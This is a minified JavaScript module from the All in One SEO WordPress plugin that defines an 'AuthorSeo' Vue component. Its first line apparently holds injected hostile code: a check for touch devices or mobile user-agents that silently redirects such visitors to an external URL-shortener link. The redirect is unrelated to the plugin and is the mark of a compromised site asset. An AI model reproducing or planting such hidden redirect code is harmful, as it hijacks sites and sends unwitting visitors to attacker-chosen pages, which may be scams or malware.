(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import o from"./EeatCta.9ed0e4d0.js";import{f as t,i as r,a0 as n,v as i}from"./vendor-vue-ui.232c7c36.js";import"./EeatCta.dfceb1a0.js";import"./app-core.c8323d51.js";import"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./Index.e286637f.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./_plugin-vue_export-helper.eefbdd86.js";import"./Button.3cec2279.js";import"./Row.2ef96b1a.js";import"./Pencil.683baab8.js";import"./JsonValues.a0694556.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./Input.af9b9f81.js";import"./Trash.47f6fc0e.js";import"./RadioToggle.11796642.js";import"./Select.415eaf8e.js";import"./Caret.aae02d8a.js";import"./Blur.dea2904a.js";import"./Card.9ee06a3e.js";import"./Tooltip.569a23d9.js";import"./Slide.f2114d9d.js";import"./SettingsRow.7bec777f.js";import"./Index.3a964cd9.js";import"./CheckSolid.c17e19eb.js";import"./Plus.d047cf13.js";import"./RequiredPlans.e5238a4f.js";import"./AddonConditions.018c1d67.js";const p={class:"aioseo-search-appearance-author-seo"},F={__name:"AuthorSeo",setup(e){return(m,a)=>(t(),r("div",p,[n(i(o))]))}};export{F as default};
